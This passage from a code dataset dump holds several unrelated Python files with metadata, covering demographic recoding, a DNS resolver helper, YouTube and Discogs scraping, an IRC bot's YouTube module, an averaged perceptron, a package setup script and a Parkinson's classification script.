"usage_type": "call"}, {"api_name": "torch.nn", "line_number": 284, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 285, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 285, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 287, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 287, "usage_type": "name"}, {"api_name": "torch.optim.LBFGS", "line_number": 351, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 351, "usage_type": "name"}]} +{"seq_id": "537616202", "text": "import logging\n\nimport pandas as pd\nimport numpy as np\nimport dask.dataframe as dd\n\nfrom recoding.src.main.recoding import respondent_level_recoding\n\n\ndef emm_respondent_level_recoding(demo_df, lv):\n \"\"\"\n :param demo_df:\n :param lv:\n :return:\n \"\"\"\n assert isinstance(demo_df, pd.DataFrame)\n\n demo_df = demo_df.rename(columns={col: col.lower() for col in demo_df.columns})\n\n gen_res_df = respondent_level_recoding(demo_df, lv + ['age7'], 'mobileid', 'zip_code')\n\n logger = logging.getLogger(__name__)\n\n res_df = pd.DataFrame()\n\n logger.info('Setting the respondentid from mobile id')\n\n res_df['respondentid'] = demo_df['mobileid'].to_frame()\n\n for demo in lv:\n logger.info('Recoding demographic: {}'.format(demo))\n\n try:\n\n if demo == 'gender_age':\n gen_res_df['agegrp'] = gen_res_df['age7'].isin([1, 2]).astype(int)\n gen_res_df['agegrp'] = 2 * gen_res_df['age7'].isin([3, 4]).astype(int)\n gen_res_df['agegrp'] = 3 * (gen_res_df['age7'] == 5).astype(int)\n\n gen_res_df[demo] = gen_res_df['agegrp']\n\n indices = gen_res_df['gender'] == 2\n gen_res_df.loc[indices, 'gender_age'] += 3\n\n gen_res_df.drop('agegrp', axis=1, inplace=True)\n\n except Exception as e:\n logger.fatal(e, exc_info=True)\n logger.fatal('A column does not exist')\n res_df[demo] = np.nan\n\n res_df = pd.merge(gen_res_df, res_df, on='respondentid')\n\n logger.info('Removing any recoded demographic variables with code 0')\n indices = (res_df == 0).sum(axis=1) == 0\n\n res_df = res_df.loc[indices, :].reset_index(drop=True)\n\n return res_df\n\n\ndef main_emm_recode(emm_raw_df, lv):\n \"\"\"\n :param emm_raw_df:\n :param lv:\n :return:\n \"\"\"\n\n if isinstance(emm_raw_df, pd.DataFrame):\n assert isinstance(lv, list)\n\n return emm_respondent_level_recoding(emm_raw_df, lv)\n\n elif isinstance(emm_raw_df, dd.DataFrame):\n assert isinstance(lv, list)\n\n return emm_raw_df.map_partitions(lambda df: emm_respondent_level_recoding(df, lv))\n", "sub_path": "recoding/src/main/emm/recoding.py", "file_name": "recoding.py", "file_ext": "py", "file_size_in_byte": 2144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 16, "usage_type": "attribute"}, {"api_name": "recoding.src.main.recoding.respondent_level_recoding", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "attribute"}, {"api_name": "dask.dataframe.DataFrame", "line_number": 74, "usage_type": "attribute"}, {"api_name": "dask.dataframe", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "331238838", "text": "from __future__ import print_function\nfrom js9 import j\n\n\ntry:\n import dns\n import dns.message\n import dns.rdataclass\n import dns.rdatatype\n import dns.query\n import dns.resolver\nexcept Exception as e:\n print(\"WARNING install dnspython: 'pip3 install dnspython'\")\n\nJSBASE = j.application.jsbase_get_class()\n\n\nclass DNSTools(JSBASE):\n \"\"\"\n to install:\n pip3 install dnspython\n \"\"\"\n\n def __init__(self):\n self.__jslocation__ = \"j.tools.dnstools\"\n JSBASE.__init__(self)\n self._default = None\n\n def get(self, nameservers=[\"8.26.56.26\", \"8.20.247.20\"],port=53): #https://www.computerworld.com/article/2872700/endpoint-security/6-dns-services-protect-against-malware-and-other-unwanted-content.html?page=3\n if \"localhost\" in nameservers:\n nameservers.pop(nameservers.index(\"localhost\"))\n nameservers.append(\"127.0.0.1\")\n return DNSClient(nameservers=nameservers,port=port)\n\n @property\n def default(self):\n if self._default == None:\n self._default = self.get()\n\n return self._default\n\n def test(self,start=False):\n \"\"\"\n js9 'j.tools.dnstools.test()'\n \"\"\" \n\n answer=self.default.resolver.query(\"www.yelp.com\", 'A')\n\n\n\nclass DNSClient(JSBASE):\n\n def __init__(self, nameservers,port=53):\n JSBASE.__init__(self)\n self.nameservers=nameservers\n self.resolver=dns.resolver.Resolver(configure = False)\n self.resolver.nameservers=self.nameservers\n self.resolver.port=port\n\n\n def nameservers_get(self, domain = \"threefoldtoken.org\"):\n\n answer=self.resolver.query(domain, 'NS')\n\n res=[]\n for rr in answer:\n res.append(rr.target.to_text())\n return res\n\n def namerecords_get(self, dnsurl = \"www.threefoldtoken.org\"):\n \"\"\"\n return ip addr for a full name\n \"\"\"\n\n answer=self.resolver.query(dnsurl, 'A')\n\n res=[]\n for rr in answer:\n res.append(rr.address)\n return res\n", "sub_path": "JumpScale9Lib/tools/dns/DNSTools.py", "file_name": "DNSTools.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "js9.j.application.jsbase_get_class", "line_number": 15, "usage_type": "call"}, {"api_name": "js9.j.application", "line_number": 15, "usage_type": "attribute"}, {"api_name": "js9.j", "line_number": 15, "usage_type": "name"}, {"api_name": "dns.resolver.Resolver", "line_number": 56, "usage_type": "call"}, {"api_name": "dns.resolver", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "456170121", "text": "import urllib\nimport urllib.request as req\nimport re\nimport json\nfrom datetime import time\n\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, abort\nfrom flask import request\nfrom flask import jsonify\n\napp = Flask(__name__)\n\n\nclass RatedTrack:\n def __init__(self, track, views):\n self.track = track\n self.views = views\n\n\ndef fetch_page(url):\n opener = req.build_opener()\n page = opener.open(url)\n return page\n\n\ndef filter_out_tracks(html_data):\n parsed_html = BeautifulSoup(html_data, 'html.parser')\n track_tags = parsed_html.find_all('span', attrs={'class': 'tracklist_track_title'})\n tracks = list(map(lambda t: t.text, list(track_tags)))\n return tracks\n\n\ndef get_track_list(url):\n page = fetch_page(url)\n html_data = page.read()\n return filter_out_tracks(html_data)\n\n\ndef rate_track(artist, track):\n # Get numbers of views\n query = '{}+{}'.format(artist, '+'.join(track.split()))\n query_string = urllib.parse.urlencode({'search_query': query})\n html_content = urllib.request.urlopen('http://www.youtube.com/results?' + query_string)\n search_results = re.findall(r'
  • (.{2,15}) wyświetle[ń|nia]', html_content.read().decode())\n\n # Convert numbers of views to integer\n search_results = [''.join(num.split()) for num in search_results]\n search_results = [int(num) for num in search_results]\n\n # Return the highest number of views\n return sorted(search_results, reverse=True)[0]\n\n\ndef rate_tracks(artist, tracks):\n # Get number of views for all tracks\n rated_tracks = []\n for track in tracks:\n try:\n views = rate_track(artist, track)\n except Exception:\n views = 0\n rated_track = dict()\n rated_track['track'] = track\n rated_track['views'] = views\n rated_tracks.append(rated_track)\n\n # Return a sorted array of tracks\n return sorted(rated_tracks, reverse=True, key=lambda rated_track: rated_track['views'])\n\n\n@app.route('/')\ndef generate_response():\n # Parse arguments\n try:\n artist = request.args[\"artist\"]\n url = request.args[\"url\"]\n except Exception:\n abort(400)\n\n # Get track list\n try:\n tracks = get_track_list(url)\n except:\n abort(404)\n\n # Rate tracks\n try:\n response = rate_tracks(artist, tracks)\n except Exception:\n return json.dumps(tracks)\n\n return json.dumps(response)\n\n\nif __name__ == '__main__':\n app.run()\n #tmp = generate_response('queen', 'https://www.discogs.com/Queen-Queen-II/master/31526')\n #print(tmp)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2571, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request.build_opener", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 43, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 85, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "583166405", "text": "# coding=utf8\n\"\"\"\nyoutube.py - Willie YouTube Module\nCopyright 2012, Dimitri Molenaars, Tyrope.nl.\nCopyright © 2012-2014, Elad Alfassa, \nCopyright 2012, Edward Powell, embolalia.net\nLicensed under the Eiffel Forum License 2.\n\nhttp://willie.dfbta.net\n\nThis module will respond to .yt and .youtube commands and searches the youtubes.\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom willie import web, tools\nfrom willie.module import rule, commands, example\nimport json\nimport re\nimport sys\nif sys.version_info.major < 3:\n from HTMLParser import HTMLParser\nelse:\n from html.parser import HTMLParser\n\nregex = re.compile('(youtube.com/watch\\S*v=|youtu.be/)([\\w-]+)')\n\n\ndef setup(bot):\n if not bot.memory.contains('url_callbacks'):\n bot.memory['url_callbacks'] = tools.WillieMemory()\n bot.memory['url_callbacks'][regex] = ytinfo\n\n\ndef shutdown(bot):\n del bot.memory['url_callbacks'][regex]\n\n\ndef ytget(bot, trigger, uri):\n bytes = web.get(uri)\n result = json.loads(bytes)\n try:\n if 'feed' in result:\n video_entry = result['feed']['entry'][0]\n else:\n video_entry = result['entry']\n except KeyError:\n return {'link': 'N/A'} # Empty result\n\n vid_info = {}\n try:\n # The ID format is tag:youtube.com,2008:video:RYlCVwxoL_g\n # So we need to split by : and take the last item\n vid_id = video_entry['id']['$t'].split(':')\n vid_id = vid_id[len(vid_id) - 1] # last item is the actual ID\n vid_info['link'] = 'http://youtu.be/' + vid_id\n except KeyError:\n vid_info['link'] = 'N/A'\n\n try:\n vid_info['title'] = video_entry['title']['$t']\n except KeyError:\n vid_info['title'] = 'N/A'\n\n #get youtube channel\n try:\n vid_info['uploader'] = video_entry['author'][0]['name']['$t']\n except KeyError:\n vid_info['uploader'] = 'N/A'\n\n #get upload time in format: yyyy-MM-ddThh:mm:ss.sssZ\n try:\n upraw = video_entry['published']['$t']\n #parse from current format to output format: DD/MM/yyyy, hh:mm\n vid_info['uploaded'] = '%s/%s/%s, %s:%s' % (upraw[8:10], upraw[5:7],\n upraw[0:4], upraw[11:13],\n upraw[14:16])\n except KeyError:\n vid_info['uploaded'] = 'N/A'\n\n #get duration in seconds\n try:\n duration = int(video_entry['media$group']['yt$duration']['seconds'])\n #Detect liveshow + parse duration into proper time format.\n if duration < 1:\n vid_info['length'] = 'LIVE'\n else:\n hours = duration / (60 * 60)\n minutes = duration / 60 - (hours * 60)\n seconds = duration % 60\n vid_info['length'] = ''\n if hours:\n vid_info['length'] = str(hours) + 'hours'\n if minutes or seconds:\n vid_info['length'] = vid_info['length'] + ' '\n if minutes:\n vid_info['length'] = vid_info['length'] + str(minutes) + 'mins'\n if seconds:\n vid_info['length'] = vid_info['length'] + ' '\n if seconds:\n vid_info['length'] = vid_info['length'] + str(seconds) + 'secs'\n except KeyError:\n vid_info['length'] = 'N/A'\n\n #get views\n try:\n views = video_entry['yt$statistics']['viewCount']\n vid_info['views'] = str('{0:20,d}'.format(int(views))).lstrip(' ')\n except KeyError:\n vid_info['views'] = 'N/A'\n\n #get comment count\n try:\n comments = video_entry['gd$comments']['gd$feedLink']['countHint']\n vid_info['comments'] = str('{0:20,d}'.format(int(comments))).lstrip(' ')\n except KeyError:\n vid_info['comments'] = 'N/A'\n\n #get likes & dislikes\n try:\n likes = video_entry['yt$rating']['numLikes']\n vid_info['likes'] = str('{0:20,d}'.format(int(likes))).lstrip(' ')\n except KeyError:\n vid_info['likes'] = 'N/A'\n try:\n dislikes = video_entry['yt$rating']['numDislikes']\n vid_info['dislikes'] = str('{0:20,d}'.format(int(dislikes))).lstrip(' ')\n except KeyError:\n vid_info['dislikes'] = 'N/A'\n return vid_info\n\n\n@commands('yt', 'youtube')\n@example('.yt how to be a nerdfighter FAQ')\ndef ytsearch(bot, trigger):\n \"\"\"Search YouTube\"\"\"\n #modified from ytinfo: Copyright 2010-2011, Michael Yanovich, yanovich.net, Kenneth Sham.\n if not trigger.group(2):\n return\n uri = 'https://gdata.youtube.com/feeds/api/videos?v=2&alt=json&max-results=1&q=' + trigger.group(2)\n video_info = ytget(bot, trigger, uri)\n\n if video_info is 'err':\n return\n\n if video_info['link'] == 'N/A':\n bot.say(\"Sorry, I couldn't find the video you are looking for\")\n return\n message = ('[YT Search] Title: ' + video_info['title'] +\n ' | Uploader: ' + video_info['uploader'] +\n ' | Duration: ' + video_info['length'] +\n ' | Uploaded: ' + video_info['uploaded'] +\n ' | Views: ' + video_info['views'] +\n ' | Link: ' + video_info['link'])\n\n bot.say(HTMLParser().unescape(message))\n\n\n@rule('.*(youtube.com/watch\\S*v=|youtu.be/)([\\w-]+).*')\ndef ytinfo(bot, trigger, found_match=None):\n \"\"\"\n Get information about the latest video uploaded by the channel provided.\n \"\"\"\n match = found_match or trigger\n #Grab info from YT API\n uri = 'https://gdata.youtube.com/feeds/api/videos/' + match.group(2) + '?v=2&alt=json'\n\n video_info = ytget(bot, trigger, uri)\n if video_info is 'err':\n return\n\n #combine variables and print\n message = '[YouTube] Title: ' + video_info['title'] + \\\n ' | Uploader: ' + video_info['uploader'] + \\\n ' | Uploaded: ' + video_info['uploaded'] + \\\n ' | Duration: ' + video_info['length'] + \\\n ' | Views: ' + video_info['views'] + \\\n ' | Comments: ' + video_info['comments'] + \\\n ' | Likes: ' + video_info['likes'] + \\\n ' | Dislikes: ' + video_info['dislikes']\n\n bot.say(HTMLParser().unescape(message))\n\n\n@commands('ytlast', 'ytnew', 'ytlatest')\n@example('.ytlast vlogbrothers')\ndef ytlast(bot, trigger):\n if not trigger.group(2):\n return\n uri = 'https://gdata.youtube.com/feeds/api/users/' + trigger.group(2) + '/uploads?max-results=1&alt=json&v=2'\n video_info = ytget(bot, trigger, uri)\n\n if video_info is 'err':\n return\n\n message = ('[Latest Video] Title: ' + video_info['title'] +\n ' | Duration: ' + video_info['length'] +\n ' | Uploaded: ' + video_info['uploaded'] +\n ' | Views: ' + video_info['views'] +\n ' | Likes: ' + video_info['likes'] +\n ' | Dislikes: ' + video_info['dislikes'] +\n ' | Link: ' + video_info['link'])\n\n bot.say(HTMLParser().unescape(message))\n", "sub_path": "willie/modules/youtube.py", "file_name": "youtube.py", "file_ext": "py", "file_size_in_byte": 6932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.version_info", "line_number": 20, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "willie.tools.WillieMemory", "line_number": 30, "usage_type": "call"}, {"api_name": "willie.tools", "line_number": 30, "usage_type": "name"}, {"api_name": "willie.web.get", "line_number": 39, "usage_type": "call"}, {"api_name": "willie.web", "line_number": 39, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 155, "usage_type": "call"}, {"api_name": "willie.module.commands", "line_number": 132, "usage_type": "call"}, {"api_name": "willie.module.example", "line_number": 133, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 181, "usage_type": "call"}, {"api_name": "willie.module.rule", "line_number": 158, "usage_type": "call"}, {"api_name": "html.parser.HTMLParser", "line_number": 203, "usage_type": "call"}, {"api_name": "willie.module.commands", "line_number": 184, "usage_type": "call"}, {"api_name": "willie.module.example", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "377258287", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 9 23:41:32 2014\n\n@author: boyan\n\"\"\"\nfrom collections import defaultdict\n\n\nclass AveragedPerceptron(object):\n\n \"\"\"An averaged perceptron\"\"\"\n\n def __init__(self):\n # weights is a dict of dicts, value=weights[history][label]\n self.weights = {}\n self.labels = set()\n # The accumulated values, for the averaging.\n self._totals = defaultdict(int)\n self._tstamps = defaultdict(int)\n self.i = 0\n\n def predict(self, features):\n \"\"\"Return best label and its score according to given features\"\"\"\n scores = defaultdict(float)\n for feat, value in features.items():\n if feat not in self.weights or value == 0:\n continue\n weights = self.weights[feat]\n for label, weight in weights.items():\n scores[label] += value * weight\n return max(self.labels, key=lambda label: (scores[label], label))\n\n def update(self, truth, guess, features):\n \"\"\"Update the feature weights\"\"\"\n def upd(label, feat, w, v):\n param = (feat, label)\n self._totals[param] += (self.i - self._tstamps[param]) * w\n self._tstamps[param] = self.i\n self.weights[feat][label] = w + v\n\n self.i += 1\n if truth != guess:\n for feat in features:\n weights = self.weights.setdefault(feat, {})\n upd(truth, feat, weights.get(truth, 0.0), 1.0)\n upd(guess, feat, weights.get(guess, 0.0), -1.0)\n\n def average_weights(self):\n \"\"\"Average weights from all iterations\"\"\"\n for feat, label_weights in self.weights.items():\n new_feat_weights = {}\n for label, weight in label_weights.items():\n param = (feat, label)\n total = self._totals[param]\n total += (self.i - self._tstamps[param]) * weight\n averaged = round(total / float(self.i), 3)\n if averaged:\n new_feat_weights[label] = averaged\n self.weights[feat] = new_feat_weights\n", "sub_path": "perceptron.py", "file_name": "perceptron.py", "file_ext": "py", "file_size_in_byte": 2128, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "283054986", "text": "from setuptools import setup\n\nmmtfPyspark_packages = ['mmtfPyspark',\n 'mmtfPyspark.datasets',\n 'mmtfPyspark.filters',\n 'mmtfPyspark.io',\n 'mmtfPyspark.mappers',\n 'mmtfPyspark.ml',\n 'mmtfPyspark.utils',\n 'mmtfPyspark.webfilters',\n 'mmtfPyspark.webservices',\n 'mmtfPyspark.interactions'\n ]\n\nmmtfPyspark_dependencies = ['msgpack>=0.5.6',\n 'numpy>=1.15.4',\n 'ipywidgets>=7.4.2',\n 'mmtf-python>=1.1.2',\n 'requests>=2.20.0',\n 'matplotlib>=2.2.3',\n 'numba>=0.41.0',\n 'seaborn>=0.8.1',\n 'sympy>=1.1.1',\n 'py3Dmol>=0.8.0',\n 'scipy>=1.1.0',\n 'scikit-learn>=0.20.0',\n 'pandas>=0.23.4',\n 'py4j>=0.10.7',\n 'pyarrow>=0.11.1',\n 'xlrd>=1.1.0',\n 'nose',\n 'cython',\n ]\n\nLONG_DESCRIPTION = \"\"\"\n**mmtfPyspark** is a python package that provides APIs and sample applications for distributed analysis and scalable mining of 3D biomacromolecular structures, such as the Protein Data Bank (PDB) archive. mmtfPyspark uses Big Data technologies to enable high-performance parallel processing of macromolecular structures.\n\"\"\"\n\nsetup(name='mmtfPyspark',\n version='0.3.0',\n description='Methods for parallel and distributed analysis and mining of the Protein Data Bank using MMTF and Apache Spark',\n long_description=LONG_DESCRIPTION,\n url='https://github.com/sbl-sdsc/mmtf-pyspark',\n author='Peter Rose',\n author_email='pwrose.ucsd@gmail.com',\n license='Apache License 2.0',\n keywords='mmtf spark pyspark protein PDB',\n packages=mmtfPyspark_packages,\n install_requires=mmtfPyspark_dependencies,\n python_requires='>=3.8',\n include_package_data=True,\n test_suite='nose.collector',\n test_require=['nose'],\n classifiers=['Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6'],\n zip_safe=False)\n", "sub_path": "setup-dev.py", "file_name": "setup-dev.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "276996718", "text": "# classification\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nfrom pandas.plotting import scatter_matrix\nwarnings.simplefilter('ignore')\nsns.set()\n\n#loading dataset\nfrom sklearn.datasets import load_iris\ndataset=load_iris()\n\n\n# Importing the dataset\ndataset = pd.read_csv('parkinsonsdata.csv')\n#finding outliers\nfrom scipy import stats\nz=np.abs(stats.zscore(dataset.iloc[:,1:]))\nprint(z)\nthreshold=3\nprint(np.where(z>3))\nprint(z[73][1])\n\nq1=dataset.quantile(0.25)\nq3=dataset.quantile(0.75)\nIQR=q3-q1\nprint(IQR)\n\nprint((dataset<(q1-1.5*IQR))|(dataset>(q3+1.5*IQR)))\ndataset=dataset[(z<3).all(axis=1)]\ndataset.shape\ndataset.size\n\nX=dataset.iloc[:,[1,2,3,10,14,16]].values\ny=dataset.iloc[:,-1].values\n\nfeatures=dataset.loc[:,dataset.columns!='status'].values[:,1:]\ntarget=dataset.loc[:,'status'].values\n\nprint(dataset.columns)\nprint(dataset.shape)\nprint(dataset.head(7))\nprint(dataset.tail(7))\nprint(dataset.describe())\nprint(X.shape)\nprint(y[y==1].shape[0],y[y==0].shape[0])\ndataset.corr(method='pearson')\n\n\n'''from sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\nbestfeatures = SelectKBest(score_func=chi2, k=12)\nfit = bestfeatures.fit(X,y)\ndfscores = pd.DataFrame(fit.scores_)\ndfcolumns = pd.DataFrame(X.columns)\n#concat two dataframes for better visualization \nfeatureScores = pd.concat([dfcolumns,dfscores],axis=1)\nfeatureScores.columns = ['features','Score'] #naming the dataframe columns\nprint(featureScores.nlargest(12,'Score')) #print 10 best features\n\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport matplotlib.pyplot as plt\nmodel = ExtraTreesClassifier()\nmodel.fit(X,y)\nprint(model.feature_importances_) #use inbuilt class feature_importances of tree based classifiers\n#plot graph of feature importances for better visualization\nfeat_importances = pd.Series(model.feature_importances_, index=X.columns)\nfeat_importances.nlargest(12).plot(kind='barh')\nplt.show()'''\n\nsns.heatmap(X)\n\n\n\n'''# class distribution\nprint(dataset.groupby('class').size())\n# box and whisker plots\ndataset.plot(kind='box', subplots=True, layout=(2,2), sharex=False, sharey=False)\nplt.show()\n# histograms\ndataset.hist()\nplt.show()\n# scatter plot matrix\nscatter_matrix(dataset)\nplt.show()'''\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nsc = StandardScaler()\nsc = MinMaxScaler((-1,1))\nX=sc.fit_transform(X_train,X_test)\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nfrom sklearn import model_selection\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Spot Check Algorithms\nmodels = []\nmodels.append(('LR', LogisticRegression(solver='liblinear', multi_class='ovr')))\nmodels.append(('LDA', LinearDiscriminantAnalysis(n_components=2)))\nmodels.append(('KNN', KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)))\nmodels.append(('CART', DecisionTreeClassifier(criterion = 'gini', splitter='best',min_samples_split=2)))\nmodels.append(('NB', GaussianNB(var_smoothing=1e-9)))\n#models.append(('SVM', SVC(kernel = 'linear', random_state = 0)))\n#models.append(('SVM', SVC(kernel = 'poly', degree=3, gamma=2, coef0=1)))\n#models.append(('Random',RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 5,bootstrap=True,max_depth=70)))\nmodels.append(('Random',RandomForestClassifier(n_estimators = 10,random_state = 0)))\nmodels.append(('SVM', SVC(kernel='rbf',gamma=0.71,random_state = 0,C=1)))\n# evaluate each model in turn\nresults = []\nnames = []\nfor name, model in models:\n\tkfold = model_selection.KFold(n_splits=10, random_state=0)\n\tcv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring='accuracy')\n\tresults.append(cv_results)\n\tnames.append(name)\n\tmsg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n\tprint(msg)\n\n\n# graph Comparison Algorithms \nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n\n\n\n# Make predictions on validation dataset\nlda = SVC()\nlda.fit(X_train, y_train)\ny_pred = lda.predict(X_test)\n#y_pred = lda.score(X_test,y_test)\naccuracy=accuracy_score(y_test, y_pred)\nprint('accuracy:',accuracy)\ncm = confusion_matrix(y_test, y_pred)\nprint('cm:','\\n', cm)\ncr=classification_report(y_test, y_pred)\nprint('report:','\\n',cr)\n\n\nPcorrect=(y_test == y_pred).sum()\nPwrong=(y_test != y_pred).sum()\nAccuracy=Pcorrect/39\nError=Pwrong/39 \n\n'''from sklearn.model_selection import GridSearchCV\nparameters={'n_estimators': [10], \n 'max_features':[3], \n 'random_state' : [5],\n 'bootstrap':[True]}\n\ngrid_search=GridSearchCV(estimator=lda,\n param_grid=parameters,\n cv=10,n_jobs=-1,verbose=2,\n scoring = 'accuracy',\n refit=True)\ngrid_search.fit(X_train, y_train)\nbest_accuracy = grid_search.best_score_\nbest_parameters = grid_search.best_params_'''\n\n\ncor=dataset.corr()\nfig=plt.figure()\nax=fig.add_subplot(111)\ncax=ax.matshow(cor,vmin=-1,vmax=1)\nfig.colorbar(cax)\n", "sub_path": "parkinson.py", "file_name": "parkinson.py", "file_ext": "py", "file_size_in_byte": 5814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 9, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.zscore", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 119, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 121, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 122, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 133, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.boxplot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 158, "usage_type": "call"}, 